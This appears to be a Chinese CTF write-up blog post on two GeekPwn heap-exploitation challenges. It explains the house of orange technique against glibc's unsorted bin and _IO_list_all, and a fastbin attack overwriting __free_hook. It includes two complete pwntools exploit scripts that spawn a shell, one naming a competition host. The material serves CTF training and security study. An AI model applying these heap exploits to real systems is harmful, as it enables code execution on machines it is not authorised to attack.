Geekpwn

0x01paperpointer

先介绍下本题的利用手法:house of orange

前提:需要有较大范围内的堆溢出,并泄露libc基址。

1、删除一个堆块至unsorted bin,并修改该chunk的bk为_IO_list_all-0x10。

参考源码:

1
2
3
4
5
6
7
8
9
10
11
while ((victim = unsorted_chunks(av)->bk) != unsorted_chunks(av)) {
            bck = victim->bk;
            [...]
            /* remove from unsorted list */
            unsorted_chunks(av)->bk = bck;
            bck->fd = unsorted_chunks(av);
            if (__builtin_expect (victim->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (victim->size > av->system_mem, 0))
  malloc_printerr (check_action, "malloc(): memory corruption",
                   chunk2mem (victim), av);//攻击开始函数
            }

可以看到当remove from unsorted list时,bck=_IO_list_all-0x10,unsorted_chunks(av)=main_arean+88

因此赋值是会发生:

main_arean+88+0x18=_IO_list_all-0x10

_IO_list_all-0x10+0x10=main_arean+88

说明:进程内所有的_IO_FILE 结构会使用_chain 域相互连接形成一个链表,这个链表的头部由_IO_list_all 维护,其一般指向IO_2_1_stderr

所以等到函数调用时,就会从 _IO_2_1_stderr*改变去 arena 里。

2、修改该unsorted bin的pre+size为’/bin/sh’,size为0x61。

参考源码:

1
2
3
4
5
6
7
8
9
10
/* place chunk in bin */
    if (in_smallbin_range(size)) {
        victim_index = smallbin_index(size);
        bck = bin_at(av, victim_index);
        fwd = bck->fd;
    [...]
    victim->bk = bck;
    victim->fd = fwd;
    fwd->bk = victim;
    bck->fd = victim;

由于我们伪造的size为0x61,所以会进入small bin,可以看到此时的赋值操作为:

fwd->bk=victim

即:main_arean+88+0x60+0x18=victim(chunk地址)

而在IO_file的结构体中,offset为0x78处正好为_chain 指针,所以若是在 arena 里的file流要跳转,就会跳转到原chunk里

说明:struct _IO_FILE _chain;/指向下一个file结构/

3、伪造file里的数据绕过检查。

_mode <= 0
_IO_write_ptr >_IO_write_base

_IO_vtable_offset (fp) == 0(无法变动)
_mode > 0
_wide_data->_IO_write_ptr > wide_data->_IO_write_base

img

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
from pwn import *
context.log_level='debug'
DEBUG=1
if DEBUG:
	p=process("./pwn")
else:
	p=remote("183.60.136.230",16145)

def cmd(command):
	p.recvuntil("your choice:")
	p.sendline(str(command))

def edit(offset,sz,content):
	cmd(1)
	p.recvuntil(":")
	p.sendline(str(offset))
	p.recvuntil(":")
	p.sendline(str(sz))
	p.recvuntil(":")
	p.send(content)

def dele(offset):
	cmd(2)
	p.recvuntil(":")
	p.sendline(str(offset))

def pwn():
	p.recvuntil("0x")
	sleep=int(p.recv(3),16)
	byte=(sleep<<8)+0xa00000
	print hex(byte)
	edit(0x400,0x200,p64(0)+p64(0x141)+'a'*0x60+'\x00'*(0x130-0x60)+p64(0)+p64(0x21)+'\x00'*0x10+p64(0)+p64(0x21))
	edit(0,0x100,p64(0)+p64(0x91)+'\x00'*0x80+(p64(0)+p64(0x21))*3)
	edit(0xc0,0x200,p64(0)+p64(0x91)+p64(0)*2+p64(0)+p64(0x91)+'\x00'*0x30+(p64(0)+p64(0x21))*8)
	dele(0xd0)
	dele(0xf0)
	dele(0x410)
	cmd(3)
	edit(0xf8,3,p64(byte-0x86e60-0x10))
	dele(0x10)
	edit(0x18,3,p64(byte+0x2f9310))
	edit(0,16,'/bin/sh\x00'+p64(0x61))
	edit(0x20,16,p64(2)+p64(3))
	cmd(4)
	gdb.attach(p)
	p.interactive()

if __name__ == "__main__" :
	pwn()

0x02babypwn

利用show()负数泄露libc,利用malloc(0)实现堆溢出(0-1为最大无符号整形)

利用思路:

fastbin attcak在top_chunk附近踩出合适size。

修改top_chunk至__free_hook附近。

覆盖__free_hook为system。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
from pwn import *
context.log_level='debug'
DEBUG=1
if DEBUG:
	p=process("./pwn")
	libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
else:
	pass

def cmd(command):
	p.recvuntil(":")
	p.sendline(str(command))

def add(name,sz,content):
	cmd(1)
	p.recvuntil(":")
	p.send(str(name))
	p.recvuntil(":")
	p.sendline(str(sz))
	p.recvuntil(":")
	p.send(content)

def dele(idx):
	cmd(2)
	p.recvuntil(":")
	p.sendline(str(idx))

def show(idx):
	cmd(3)
	p.recvuntil(":")
        p.sendline(str(idx))


def pwn():
	show(-5)
	p.recvuntil("name:")
	libc.address=u64(p.recvuntil("\x7f")[-6:].ljust(8,'\x00'))-0x3c5710
	success("libc : "+hex(libc.address))
	add("oooo\n",0x10,"oooo\n")	#0
	add("oooo\n",0x30,"oooo\n")
	dele(0)
	dele(1)
	add("oooo\n",0,p64(0)*3+p64(0x41)+p64(0x51)+"\n")
	add("oooo\n",0x30,"oooo\n")	#1
	add("oooo\n",0x10,"oooo\n")	#2
	add("oooo\n",0x40,"oooo\n")	#3
	dele(2)
	dele(3)
	add("oooo\n",0,p64(0)*3+p64(0x51)+p64(libc.address+0x3c4b30)+'\n')	#2

	add("oooo\n",0x40,"/bin/sh\n") #3
	add("oooo\n",0x40,"\x00"*0x38+p64(libc.address+0x3c5c50)[:6]+'\n') # 4
	add("oooo\n",0,p64(0)*3+p64(0xffffffffffff)+"\x00"*0xb28+p64(libc.sym['system'])+'\n')
	dele(3)
#	print hex(libc.sym['__free_hook'])
	gdb.attach(p)
	p.interactive()

if __name__== '__main__':
	pwn()


谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
本站总访问量 |

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

Pwner<br>CTF is a part of my life.<br>